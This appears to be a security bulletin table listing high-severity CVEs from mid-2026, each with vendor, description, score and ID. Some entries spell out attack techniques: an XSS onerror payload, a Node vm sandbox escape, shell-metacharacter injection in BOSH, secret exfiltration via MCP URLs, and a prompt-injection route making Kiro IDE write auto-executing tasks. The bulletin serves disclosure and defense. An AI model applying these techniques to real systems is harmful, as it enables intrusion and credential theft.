| Apache Software Foundation--Apache MINA SSHD | Path traversal vulnerability in Apache MINA SSHD bundle sshd-git. Lack of path validation in git-upload-pack, git-receive-pack, and other git operations allows users authenticated over SSH access to git repositories outside the configured git server root directory. Applications are affected if they use org.apache.sshd:sshd-git. Applications not using sshd-git are not affected. Users are advised to upgrade affected applications to Apache MINA SSHD 2.18.0, which fixes the issue. The issue is also present in the pre-release milestones 3.0.0-M1 to 3.0.0-M3 of the upcoming new major version 3.0.0. Again, applications are affected only if they use sshd-git. Upgrade affected applications to 3.0.0-M4. We would like to point out that a professional git server should not rely solely on file system layout and permissions, but should implement additional security controls to govern access to git repositories and operations allowed on particular git repositories. | 2026-06-01 | 7.1 | CVE-2026-48827 |
| Apache Software Foundation--Apache Solr | Hardcoded credentials in the Basic Authentication setup tool (bin/solr auth enable) in Apache Solr versions 9.4.0 through 9.10.1 and 10.0.0 allow a remote attacker to gain full administrative access to the cluster via publicly known default credentials installed silently alongside the user-specified account. As an immediate workaround without upgrading, delete the template users (superadmin, admin, search, index) from security.json or change their passwords. The future, not yet released, versions 9.11.0 and 10.1.0 will not be vulnerable, and it will be enough to upgrade to solve the issue. Not affected: (1) clusters where bin/solr auth enable was not used to bootstrap BasicAuth; (2) clusters where template users have been assigned strong passwords after bootstrap. | 2026-06-01 | 8.1 | CVE-2026-44825 |
| Arista Networks--EOS | On affected platforms running Arista EOS with OpenConfig configured, a gNMI Set request can be run when it should have been rejected. This can result in unexpected configuration being applied to the switch. | 2026-06-04 | 9.6 | CVE-2024-27890 |
| Arista Networks--EOS | On affected platforms running Arista EOS with OpenConfig configured, a gNMI Set request can be run when it should have been rejected. This can result in unexpected configuration being applied to the switch. | 2026-06-04 | 9.6 | CVE-2024-27892 |
| Arista Networks--EOS | On affected platforms running Arista EOS with IPsec configured, a specially crafted packet can cause the dataplane to stop processing all IPsec traffic. The control plane may detect this condition, and attempt to reset the IPsec processing pipeline. After reset traffic may not resume being processed. There is no impact to non-IPsec traffic or to IPsec traffic not originating or terminating on the system. This issue was reported by an Arista customer. | 2026-06-04 | 7.5 | CVE-2025-8873 |
| Arista Networks--EOS / CloudVision eXchange (CVX) | An authenticated Redis session could be used to obtain full root access to all servers in the CVX cluster. Note that this would require an attacker to have both network access to the Redis service on a CVX server and the Redis password. Please note that all Redis communication, including authentication, occurs over plaintext in the present day. TLS support is tracked under RFE1294850. | 2026-06-05 | 8.3 | CVE-2025-5088 |
| Armcode--Arm Whois | Arm Whois 3.11 contains a stack-based buffer overflow vulnerability that allows remote attackers to execute arbitrary code by supplying oversized input to the IP address or domain field. Attackers can craft malicious input exceeding 658 bytes with shellcode to overwrite the structured exception handler and gain command execution when the application processes the input. | 2026-06-01 | 9.8 | CVE-2018-25427 |
| Armcode--Arm Whois | Arm Whois 3.11 contains a buffer overflow vulnerability that allows local attackers to execute arbitrary code by overwriting the structured exception handler. Attackers can craft a malicious input file with a 672-byte offset to overwrite the nSEH and SEH pointers, enabling code execution through exception handler hijacking. | 2026-06-01 | 8.4 | CVE-2018-25432 |
| armember--ARMember Premium Membership Plugin, Content Restriction, Member Levels, User Profile & User signup | The ARMember Premium plugin for WordPress is vulnerable to an insecure password reset mechanism in all versions up to, and including, 7.3.1. The plugin stores a plaintext copy of the password reset key in the `arm_reset_password_key` user meta field when a user requests a password reset. This is in addition to the hashed key that WordPress core stores securely in `wp_users.user_activation_key`. The plaintext key stored in `wp_usermeta` can be used with the plugin's custom `armrp` reset action to set a new password for any user. Combined with another vulnerability such as SQL Injection (CVE-2026-5073, CVE-2026-5074), this makes it possible for unauthenticated attackers to extract the plaintext reset key and take over any user account, including administrators. | 2026-06-02 | 9.8 | CVE-2026-5076 |
| armember--ARMember Premium Membership Plugin, Content Restriction, Member Levels, User Profile & User signup | The ARMember Premium plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the 'arm_directory_paging_action' AJAX action in all versions up to, and including, 7.3.1. This is due to insufficient escaping on the user-supplied 'order' and 'orderby' parameters and the lack of sufficient preparation on the existing SQL query in the `arm_get_directory_members()` function. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-06-02 | 7.5 | CVE-2026-5073 |
| AsyncHttpClient--async-http-client | The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. Versions on the 2.x branch prior to 2.15.0 and the 3.x branch prior to 3.0.10 leak `Cookie` headers to cross-origin redirect targets. When following a redirect to a different origin, the `propagatedHeaders()` method in `Redirect30xInterceptor.java` strips `Authorization` and `Proxy-Authorization` headers but does not strip the `Cookie` header, causing session cookies and other sensitive cookie values to be sent to attacker-controlled servers. Versions 2.15.0 and 3.0.10 patch the issue. | 2026-06-05 | 7.4 | CVE-2026-45300 |
| AWS--AWS Advanced Go Wrapper | An untrusted search path issue in the GlobalDatabasePlugin in the AWS Advanced Go Wrapper for Amazon Aurora PostgreSQL will allow a remote authenticated low-privilege actor to escalate privileges to those of another Amazon RDS user, including rds_superuser, via a crafted function created by the actor that runs when that user connects to the cluster through the affected wrapper. To remediate this issue, users should upgrade to the AWS Advanced Go Wrapper release 2026-05-26. | 2026-06-05 | 8 | CVE-2026-11401 |
| AWS--AWS Advanced JDBC Wrapper | An untrusted search path issue in the GlobalDatabasePlugin in the AWS Advanced JDBC Wrapper for Amazon Aurora PostgreSQL will allow a remote authenticated low-privilege actor to escalate privileges to those of another Amazon RDS user, including rds_superuser, via a crafted function created by the actor that runs when that user connects to the cluster through an affected wrapper. To remediate this issue, users should upgrade to AWS Advanced JDBC Wrapper version 4.0.1. | 2026-06-05 | 8 | CVE-2026-11400 |
| AWS--Kiro IDE | Insufficient access control restrictions in the file write tool in Amazon Kiro IDE before version 0.11 might allow remote unauthenticated actors to execute arbitrary commands via crafted instructions that cause writes to execution-sensitive paths (such as .vscode/tasks.json), enabling auto-execution on folder open. To remediate this issue, users should upgrade to Kiro IDE version 0.11 or later. | 2026-06-02 | 8.8 | CVE-2026-10591 |
| Axiomthemes--Confidant | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Axiomthemes Confidant allows PHP Local File Inclusion. This issue affects Confidant: from n/a through 1.4. | 2026-06-02 | 8.1 | CVE-2025-53440 |
| Axiomthemes--Crafti | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Axiomthemes Crafti allows PHP Local File Inclusion. This issue affects Crafti: from n/a through 1.12. | 2026-06-02 | 8.1 | CVE-2025-58705 |
| Axiomthemes--Fermentio | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Axiomthemes Fermentio allows PHP Local File Inclusion. This issue affects Fermentio: from n/a through 1.5.0. | 2026-06-02 | 8.1 | CVE-2025-58897 |
| Axiomthemes--Racquet | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Axiomthemes Racquet allows PHP Local File Inclusion. This issue affects Racquet: from n/a through 1.12.0. | 2026-06-02 | 8.1 | CVE-2025-69369 |
| Axiomthemes--Spin | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Axiomthemes Spin allows PHP Local File Inclusion. This issue affects Spin: from n/a through 1.8. | 2026-06-02 | 8.1 | CVE-2025-58707 |
| Ben Balter--WP Document Revisions | Missing Authorization vulnerability in Ben Balter WP Document Revisions allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Document Revisions: from n/a before 4.0.0. | 2026-06-01 | 7.5 | CVE-2026-42677 |
| Boost--Serialization | A flaw has been found in Boost Serialization up to 1.91. The impacted element is an unknown function. This manipulation causes improper validation of specified type of input. It is possible to initiate the attack remotely. The exploit has been published and may be used. The maintainer was notified on Aug 2025 and a disclosure deadline was set for 90 days. The maintainer acknowledged but postponed indefinitely citing time concerns. No patch is currently available and the disclosure deadline has expired. | 2026-06-07 | 7.3 | CVE-2026-11460 |
| browserstack--browserstack-runner | BrowserStack Runner through 0.9.5 contains a remote code execution vulnerability in the /_log HTTP handler that allows unauthenticated network-adjacent attackers to execute arbitrary code by submitting crafted JSON request bodies to the handler, which passes user-supplied data to vm.runInNewContext() combined with eval(). Attackers can escape the Node.js vm sandbox by leveraging a host-context Function reference through util.format to access the host process via this.constructor.constructor, achieving full remote code execution on the underlying system without any authentication. | 2026-06-02 | 8.8 | CVE-2026-49143 |
| care2x--Care2x | Care2x 2.7 contains multiple SQL injection vulnerabilities that allow unauthenticated attackers to execute arbitrary SQL commands by manipulating the ck_config cookie parameter. Attackers can inject malicious SQL through the ck_config cookie in multiple endpoints including login.php, indexframe.php, and various module files to extract sensitive database information without authentication. | 2026-06-04 | 8.2 | CVE-2019-25728 |
| Chanjet--CRM | A vulnerability was identified in Chanjet CRM 1.0. This affects an unknown part of the file /tools/jxf_dump_systable.php of the component HTTP GET Request Handler. Such manipulation of the argument gblOrgID leads to sql injection. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-07 | 7.3 | CVE-2026-11456 |
| chartbrew--chartbrew | Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. In versions 4.9.0 through 5.0.0, an authenticated user with project-editor permissions can store arbitrary HTML/JavaScript in the `ChartDatasetConfig.legend` field. The payload is persisted verbatim in the database, propagated through the Chart.js rendering pipeline, and injected into the tooltip DOM element via an unguarded `innerHTML` assignment in `ChartTooltip.js`. Every unauthenticated viewer of the public dashboard triggers JavaScript execution on page load - no hover interaction is required. Browser-based Playwright verification confirmed `alert('localhost')` fires immediately and `<img src="x" onerror="alert(document.domain)">` is present in the `#chartjs-tooltip` DOM element. Version 5.0.1 contains a fix. | 2026-06-04 | 7.6 | CVE-2026-41518 |
| Chengdu Everbrite Network Technology--BeikeShop | A vulnerability was found in Chengdu Everbrite Network Technology BeikeShop up to 1.6.0.22. This impacts the function callback of the file plugins/Stripe/Controllers/StripeController.php of the component Stripe Plugin. Performing a manipulation of the argument Request results in improper authorization. The attack can be initiated remotely. The exploit has been made public and could be used. The patch is named 6719e0fc690ea0a998452092862e0f0a17c65968. It is suggested to install a patch to address this issue. | 2026-06-07 | 7.3 | CVE-2026-11462 |
| Cisco--Cisco Catalyst SD-WAN Manager | A vulnerability in the CLI of Cisco Catalyst SD-WAN Manager, formerly SD-WAN vManage, could allow an authenticated, local attacker to execute arbitrary commands as root by supplying a crafted file to the affected system. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by uploading a crafted file to the affected system. A successful exploit could allow the attacker to perform command injection attacks on an affected system and elevate their privileges as the root user. To exploit this vulnerability, the attacker must have netadmin privileges on the affected system. This would require valid credentials or exploitation of or . Cisco is not aware of successful exploitation by other methods. Cisco has observed limited cases where the exploitation of this bug resulted in a configuration change pushed to edge devices. Cisco recommends that customers upgrade to the fixed software that is documented in the that was published on May 14, 2026, and verify the configuration of the edge devices. | 2026-06-04 | 7.8 | CVE-2026-20245 |
| Cisco--Cisco Unified Communications Manager | A vulnerability in Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) could allow an unauthenticated, remote attacker to conduct server-side request forgery (SSRF) attacks through an affected device. This vulnerability is due to improper input validation for specific HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to write files to the underlying operating system that could be used later to elevate to root. Note: Cisco has assigned this security advisory a Security Impact Rating (SIR) of Critical rather than High as the score indicates. The reason is that exploitation of this vulnerability could result in an attacker elevating privileges to root. Note: To exploit this vulnerability, the WebDialer service must be enabled. WebDialer is disabled by default. | 2026-06-03 | 8.6 | CVE-2026-20230 |
| Clash Verge Rev--clash-verge-service-ipc | clash-verge-service-ipc before 2.3.0 has a world-reachable IPC endpoint, leading to local privilege escalation. | 2026-06-06 | 8.4 | CVE-2026-26422 |
| cline--cline | Cline is an autonomous coding agent as an SDK, IDE extension, or CLI assistant. In versions 2.13.0 and prior, there is a cross-origin WebSocket hijack vulnerability in Cline Kanban servers. At time of publication, there are no publicly available patches. | 2026-06-01 | 9.6 | CVE-2026-44211 |
| Cloud Foundry Foundation--BOSH | PackagePersister.validate_tgz builds "tar -tf #{tgz} 2>&1" where tgz = File.join(release_dir, 'packages', "#{name}.tgz") and name = package_meta['name'] comes directly from release.MF inside the uploaded tarball. The string is passed to Bosh::Common::Exec.sh, which executes via %x{} - i.e., /bin/sh -c. No Shellwords.escape is applied. The Models::Package Sequel validation (VALID_ID = /^[-0-9A-Za-z_+.]+$/i) would reject the name, but in create_package (lines 74-79) the shell-out in save_package_source_blob runs before package.save, so validation fires too late. Affected versions: - BOSH: all versions prior to v282.1.12 (inclusive); fixed in v282.1.12 or later | 2026-06-04 | 8.2 | CVE-2026-41011 |
| Cloud Foundry Foundation--BOSH | CWE-326 in BOSH allows a local attacker to steal Basic-auth credentials or redirect UAA token requests via MITM. HttpRequestHelper#create_async_endpoint and #send_http_get_request_synchronous hard-code OpenSSL::SSL::VERIFY_NONE, enabling an attacker to intercept traffic between bosh-monitor and the BOSH director or UAA and steal credentials. Affected versions: - BOSH: all versions prior to v282.1.9 (inclusive); fixed in v282.1.9 or later | 2026-06-04 | 8.8 | CVE-2026-41860 |
| Cloud Foundry Foundation--BOSH | A network man-in-the-middle between nats-sync and the BOSH director can steal the director credentials (Basic auth header or UAA client secret) and can tamper with the VM list that is written into the NATS authorization file. Stolen credentials grant administrative director access. UsersSync#bosh_api_response_body builds a Net::HTTP client with verify_mode = OpenSSL::SSL::VERIFY_NONE for every director call (/info, /deployments, /deployments/<name>/vms). Affected versions: - BOSH: all versions prior to v282.1.9 (inclusive); fixed in v282.1.9 or later | 2026-06-04 | 7.8 | CVE-2026-41859 |
| Cloud Foundry Foundation--BOSH Director | ReleaseJob#unpack builds job_dir = File.join(@release_dir, 'jobs', name) and job_tgz = File.join(@release_dir, 'jobs', "#{name}.tgz") where name returns @job_meta['name'], a value taken verbatim from the jobs: array of the attacker-supplied release.MF inside the uploaded tarball. These paths are then interpolated into a shell string: Bosh::Common::Exec.sh("tar -C #{job_dir} -xf #{job_tgz} 2>&1", :on_error => :return). Bosh::Common::Exec.sh executes via %x{#{command}} (bosh-common/lib/bosh/common/exec.rb:53), i.e. /bin/sh -c, so any shell metacharacters in name are interpreted. FileUtils.mkdir_p(job_dir) on line 49 creates the literal directory (no shell) and succeeds even when the name contains $()/;, so execution reaches the sh call. Affected versions: - BOSH Director: all versions prior to v282.1.12 (inclusive); fixed in v282.1.12 or later | 2026-06-04 | 8.2 | CVE-2026-41010 |
| Cloud Foundry Foundation--log-cache_release | Authentication Bypass in cf-auth-proxy in Cloud Foundry Foundation all installations allows an unauthenticated remote attacker to gain read access to every log and metric for every application and platform component via minting a JWT that the cf-auth-proxy accepts as a valid logs.admin token. Affected versions: - log-cache_release: all versions through v3.2.6 (inclusive); fixed in v3.2.7 or later - CF Deployment: all versions through v55.?.0 (inclusive); fixed in v55.?.0 or later (bundles log-cache_release v3.2.7) | 2026-06-01 | 7.5 | CVE-2026-40964 |
| Cloud Foundry Foundation--uaa_release | Cloud Foundry UAA versions v76.12.0 through v78.12.0 are vulnerable to a private key exposure. The server contains a vulnerability where EC (Elliptic Curve) private keys are inadvertently exposed through the public /token_keys endpoint. This endpoint is designed to provide public key material for JWT token verification but incorrectly exposes private key components for EC keys. The vulnerability affects deployments using EC keys for JWT token signing. The vulnerability does not affect RSA key configurations, only deployments using EC keys for JWT signing. Affected versions: - uaa_release: v76.12.0 through v78.12.0 (inclusive); fixed in v78.13.0 or later - CF Deployment: v30.0.0 through v56.0.0 (inclusive); fixed in v56.1.0 or later (bundles uaa_release v78.13.0) | 2026-06-01 | 10 | CVE-2026-40965 |
| CloudburstMC--Network | Cloudburst Network provides network components used within Cloudburst projects. A vulnerability in versions prior to `1.0.0.CR3-20260417.085727-30` impacts publicly accessible software depending on the affected versions of Network and allows an attacker to exploit a vulnerability in Network to stall the netty event loop, rendering it inoperable. All consumers of the library should upgrade to at least version `1.0.0.CR3-20260417.085727-30`. There are no known workarounds beyond updating the library. | 2026-06-05 | 7.5 | CVE-2026-45290 |
| CloudburstMC--Network | Cloudburst Network provides network components used within Cloudburst projects. A vulnerability in versions prior to `1.0.0.CR3-20260418.124334-32` impacts publicly accessible software depending on the affected versions of Network and allows an attacker to exploit a bug in Network to close the parent netty channel, rendering it inoperable. All consumers of the library should upgrade to at least version `1.0.0.CR3-20260418.124334-32`. There are no known workarounds beyond updating the library. | 2026-06-05 | 7.5 | CVE-2026-45291 |
| CloudPirates-io--helm-charts | CloudPirates Open Source Helm Charts is a collection of Helm charts. Prior to commit fcf9302, a GitHub Actions workflow (pull-request.yaml) executes attacker-controlled code from fork pull requests in a privileged context, exposing repository secrets including Docker Hub credentials and tokens without requiring maintainer approval. This issue has been patched via commit fcf9302. | 2026-06-01 | 10 | CVE-2026-45131 |
| CloudPirates-io--helm-charts | CloudPirates Open Source Helm Charts is a collection of Helm charts. Prior to commit fcf9302, a GitHub Actions workflow (generate-schema.yaml) exposes sensitive credentials (Personal Access Token and SSH signing key) to fork-controlled code due to unsafe checkout and credential handling practices. This issue has been patched via commit fcf9302. | 2026-06-01 | 10 | CVE-2026-45132 |
| Code Supply Co.--Blueprint | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Code Supply Co. Blueprint allows PHP Local File Inclusion. This issue affects Blueprint: from n/a before 1.1.5. | 2026-06-02 | 8.1 | CVE-2026-39552 |
| code-projects--Hotel and Tourism Reservation System | A vulnerability was identified in code-projects Hotel and Tourism Reservation System 1.0. This issue affects the function password_verify of the file /admin/login.php of the component Admin Login. Such manipulation of the argument Password leads to improper authentication. It is possible to launch the attack remotely. The exploit is publicly available and might be used. | 2026-06-01 | 7.3 | CVE-2026-10288 |
| code-projects--Hotel and Tourism Reservation System | A weakness has been identified in code-projects Hotel and Tourism Reservation System 1.0. The affected element is an unknown function of the file tour.php of the component GET Parameter Handler. Executing a manipulation of the argument tour can lead to sql injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. | 2026-06-01 | 7.3 | CVE-2026-10290 |
| code-projects--Hotel and Tourism Reservation System | A vulnerability has been found in code-projects Hotel and Tourism Reservation System 1.0. This affects an unknown function of the file /details.php. Such manipulation of the argument room leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2026-06-05 | 7.3 | CVE-2026-11342 |
| code-projects--Online Hospital Management System | A flaw has been found in code-projects Online Hospital Management System 1.php. This impacts the function login_user of the file login_1.php. Executing a manipulation of the argument Username can lead to sql injection. The attack can be executed remotely. The exploit has been published and may be used. | 2026-06-01 | 7.3 | CVE-2026-10208 |
| code-projects--Real State Services | A vulnerability has been found in code-projects Real State Services 1.0. This impacts an unknown function of the file /loginuser.php of the component Login. The manipulation of the argument Username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2026-06-01 | 7.3 | CVE-2026-10262 |
| code-projects--Smart Parking System | A security vulnerability has been detected in code-projects Smart Parking System 1.0. Affected is an unknown function of the component Admin Endpoint. Such manipulation leads to missing authentication. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. Multiple endpoints are affected. | 2026-06-01 | 7.3 | CVE-2026-10243 |
| code-projects--Student Admission System | A flaw has been found in code-projects Student Admission System 1.0. Affected is an unknown function of the file /index.php. This manipulation of the argument eid/did causes sql injection. The attack is possible to be carried out remotely. The exploit has been published and may be used. | 2026-06-02 | 7.3 | CVE-2026-10620 |
| code-projects--Vehicle Management System | A vulnerability was found in code-projects Vehicle Management System 1.0. This impacts an unknown function of the file newdriver.php of the component New Driver Registration Form. Performing a manipulation of the argument photo results in unrestricted upload. The attack may be initiated remotely. The exploit has been made public and could be used. | 2026-06-05 | 7.3 | CVE-2026-11344 |
| CodeAstro--Online Job Portal | A vulnerability was detected in CodeAstro Online Job Portal 1.0. The impacted element is an unknown function of the file /admin/jobs-admins/delete-jobs.php. Performing a manipulation of the argument ID results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. | 2026-06-01 | 7.3 | CVE-2026-10260 |
| CodeAstro--Online Job Portal | A flaw has been found in CodeAstro Online Job Portal 1.0. This affects an unknown function of the file /users/application_status.php. Executing a manipulation of the argument ID can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used. | 2026-06-01 | 7.3 | CVE-2026-10261 |
| codepress--Admin Columns | The Admin Columns plugin for WordPress is vulnerable to PHP Object Injection leading to Remote Code Execution in versions up to and including 7.0.18. This is due to the use of `unserialize()` without an `allowed_classes` restriction in the `IdsToCollection::get_ids_from_string()` function, which processes attacker-controlled post meta values without proper validation. This makes it possible for authenticated attackers with Contributor-level access and above to inject a serialized PHP object into a post's custom meta field and trigger arbitrary code execution by exploiting a bundled POP gadget chain, resulting in remote code execution as the web server user. | 2026-06-05 | 8.8 | CVE-2026-7654 |
| Comodo--Comodo Internet Security | Comodo Internet Security's firewall driver Inspect.sys contains an integer underflow in its IPv6 packet parser. The parser decrements an unsigned 64-bit payload-length value (taken from the IPv6 fixed header's payload length field) by the size of each IPv6 extension header without validating it, so a packet whose declared payload length is smaller than the sum of its extension-header lengths underflows the value to a near-maximal 64-bit integer. Because IPv6 parsing occurs before firewall rule enforcement, a remote, unauthenticated attacker can send a single crafted IPv6 packet - even to a host with all ports blocked - to trigger an out-of-bounds read (and, on a separate code path, an oversized memcpy) in the Windows kernel at DISPATCH_LEVEL, crashing the system (BSOD). | 2026-06-07 | 7.5 | CVE-2026-49494 |
| coreshop--CoreShop | CoreShop is a Pimcore enhanced eCommerce solution. In versions 5.0.1 through 5.1.0-beta.1, the GitHub Actions workflow (`.github/workflows/static.yml`) uses the `pull_request_target` trigger but dangerously checks out the unverified code from the pull request head (`ref: ${{ github.event.pull_request.head.ref }}`). Subsequently, it executes a script (`bin/console`) from this untrusted checkout. This allows any external attacker to achieve Remote Code Execution (RCE) on the GitHub Actions runner simply by submitting a malicious Pull Request. Also known as a "Pwn Request" vulnerability. As of time of publication, `pull_request_target` is still in the file. | 2026-06-04 | 8.2 | CVE-2026-41249 |
| crmeb--crmeb_java | A vulnerability was found in crmeb crmeb_java 1.4. Affected is the function RestTemplate.getForEntity of the file crmeb-common/src/main/java/com/zbkj/common/utils/RestTemplateUtil.java of the component base64 Qrcode Endpoint. The manipulation of the argument url results in server-side request forgery. The attack can be executed remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-03 | 7.3 | CVE-2026-10771 |
| D-Link--DI-7001 MINI | A vulnerability was detected in D-Link DI-7001 MINI up to 19.09.19A1. Impacted is the function sprintf of the file /httpd_debug.asp of the component API. The manipulation of the argument Time results in stack-based buffer overflow. The attack may be performed from remote. The exploit is now public and may be used. | 2026-06-01 | 8.8 | CVE-2026-10270 |
| D-Link--DI-8400 | A vulnerability was detected in D-Link DI-8400 up to 16.07.26A1. This affects an unknown function of the file /dbsrv.asp. Performing a manipulation of the argument str results in stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit is now public and may be used. The initial researcher advisory mentions contradicting parameter names to be affected. | 2026-06-01 | 8.8 | CVE-2026-10206 |
| danny-avila--LibreChat | LibreChat is an enhanced ChatGPT clone that supports multiple AI providers. In versions up to and including 0.8.3, the Model Context Protocol (MCP) server integration resolves ${VAR} placeholders against the server's process.env during Zod schema validation of user-supplied MCP server URLs. Any authenticated user can create a malicious MCP server configuration with a URL pointing to an attacker-controlled domain containing environment variable references, causing the LibreChat server to connect to the attacker's server and transmit critical secrets such as CREDS_KEY, CREDS_IV, JWT_SECRET, and MONGO_URI in the request URL. This enables full compromise of the installation's cryptographic materials and database credentials without requiring administrative privileges. This is patched in version 0.8.4-rc1. | 2026-06-02 | 9.6 | CVE-2026-32625 |
| danny-avila--LibreChat | LibreChat is an enhanced ChatGPT clone that supports multiple AI providers. In versions up to and including 0.7.6, an Insecure Direct Object Reference (IDOR) vulnerability exists in the API keys management endpoint (PUT /api/keys). Due to the use of the JavaScript object spread operator after setting the authenticated user's ID, any authenticated user can inject a userId parameter in the request body to overwrite any other user's API keys (e.g., OpenAI, Anthropic, Azure). This allows an attacker to replace a victim's API key configuration, potentially routing the victim's conversations through attacker-controlled keys or denying service by providing invalid keys. This is patched in version 0.8.3-rc1. | 2026-06-02 | 7.1 | CVE-2026-31942 |
| Dassault Systèmes--DELMIA Service Process Engineer | A Stored Cross-site Scripting (XSS) vulnerability affecting Process Experience Studio in DELMIA Service Process Engineer from Release 3DEXPERIENCE R2024x through Release 3DEXPERIENCE R2026x could allow an attacker to execute arbitrary script code in a user's browser session. | 2026-06-01 | 8.7 | CVE-2026-9024 |
| Dassault Systèmes--Teamwork Cloud - Standard Edition | A Deserialization of Untrusted Data vulnerability affecting Teamwork Cloud from No Magic Release 2022x through No Magic Release 2026x and Magic Collaboration Studio from CATIA Magic Release 2022x through CATIA Magic Release 2026x could lead to an unauthenticated remote code execution. | 2026-06-01 | 9.8 | CVE-2026-7858 |
| DatanoiseTV--tinyice | TinyIce is a streaming server for audio and video. In versions 0.8.95 through 2.4.1, missing authentication on WebRTC ingest endpoint allows unauthenticated stream injection. Version 2.5.0 fixes the issue by requiring either HTTP Basic auth or a `?password=` query parameter, comparing the supplied password against the per-mount source password (or the `default_source_password` fallback) using bcrypt, hooking into the existing brute-force IP rate-limiter (5 failed attempts per IP within 15 minutes triggers a lockout), and rejecting requests for mounts in `disabled_mounts`. The same release also tightens an adjacent endpoint, `POST /admin/golive/chunk`, which previously required session authentication but did not verify the session user's per-mount access nor check the CSRF token. | 2026-06-05 | 8.2 | CVE-2026-45327 |
| davidanderson--All-In-One Security (AIOS) Security and Firewall | The All-In-One Security (AIOS) - Security and Firewall plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to and including 5.4.7. This is due to insufficient input sanitization in the get_rest_route() function and missing output escaping in the column_default() method of the debug log list table. When the 'Disable REST API for non-logged in users' feature (aiowps_disallow_unauthorized_rest_requests) is enabled alongside debug logging (aiowps_enable_debug), an unauthenticated attacker can embed arbitrary HTML or JavaScript in the REST request path. The path is retrieved via urldecode($_SERVER['REQUEST_URI']), which decodes URL-encoded payloads into literal HTML characters. This decoded, unsanitized value is concatenated directly into a debug log message and stored in the database. When an administrator navigates to the AIOS Dashboard Debug Logs page, the column_default() method returns the raw database value without escaping, and the parent list table echoes it directly, causing JavaScript execution in the administrator's browser session. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute when an administrator views the debug log page, enabling nonce theft, privileged AJAX/REST actions, and potential full site compromise. | 2026-06-06 | 7.2 | CVE-2026-8438 |
| DedeCMS--DedeCMS | A vulnerability was determined in DedeCMS 5.7.88. The affected element is the function TrimMsg of the file /plus/feedback.php of the component Feedback Handler. Executing a manipulation of the argument msg can lead to sql injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2026-06-02 | 7.3 | CVE-2026-10606 |
| DedeCMS--DedeCMS | A vulnerability was identified in DedeCMS 5.7.88. The impacted element is the function dede_htmlspecialchars of the file /plus/flink.php. The manipulation of the argument msg leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2026-06-02 | 7.3 | CVE-2026-10607 |
| DedeCMS--DedeCMS | A security flaw has been discovered in DedeCMS 5.7.88. This affects the function RemoveXSS of the file /plus/carbuyaction.php. The manipulation of the argument postname/des results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-02 | 7.3 | CVE-2026-10608 |
| defenseunicorns--uds-identity-config | UDS Identity Config builds the Keycloak configuration image (realm, plugins, theme, truststore, JARs) consumed by UDS Core's Identity deployment. In versions 0.11.0 through 0.26.0, a logic error in the `client-kubernetes-secret` Keycloak client authenticator (shipped by `uds-identity-config` and consumed by UDS Core) causes the submitted `client_secret` to be overwritten with the mounted Kubernetes secret before comparison. An attacker who can reach the Keycloak token endpoint and knows a `client_id` using this authenticator can authenticate as that client with any `client_secret` value and obtain OAuth2 tokens scoped to the client's service account. In the case of the `uds-operator` client this token can be used to register/modify other clients. Version 0.26.1 patches the issue. | 2026-06-05 | 10 | CVE-2026-46389 |
| Dell--BSAFE SSL-J | Dell BSAFE SSL-J contains an allocation of resources without limits or throttling vulnerability. An unauthenticated remote attacker could potentially exploit this vulnerability, leading to a Denial of Service (DoS). | 2026-06-04 | 7.5 | CVE-2025-46638 |
| Dell--ThinOS 10 | Dell ThinOS 10, versions prior to ThinOS10 2602_10.0765, contain an Improper Access Control vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Privilege Escalation. | 2026-06-02 | 7.8 | CVE-2026-40715 |
| Dräger--CC-Vision Basic | Dräger CC-Vision Basic before 7.5.3 and Dräger CC-Vision E-Cal before 7.2.5.0 contain an out-of-bounds write vulnerability when loading .gdt files. A crafted .gdt file can trigger a buffer overflow during file parsing, allowing an attacker to crash the application or execute malicious code on the underlying system. | 2026-06-02 | 8.2 | CVE-2021-4478 |
| Dräger--Core | Dräger Core 1.0.5 and Dräger M540 Converter Service 1.0.9 contain a denial of service vulnerability that allows network-adjacent attackers to trigger high CPU load by sending specially crafted, unencrypted SDC messages during the discovery process. Attackers with access to the hospital network can send malformed SDC packets to exhaust CPU resources in the affected process, causing further SDC messages to no longer be processed. | 2026-06-02 | 7.5 | CVE-2024-14036 |
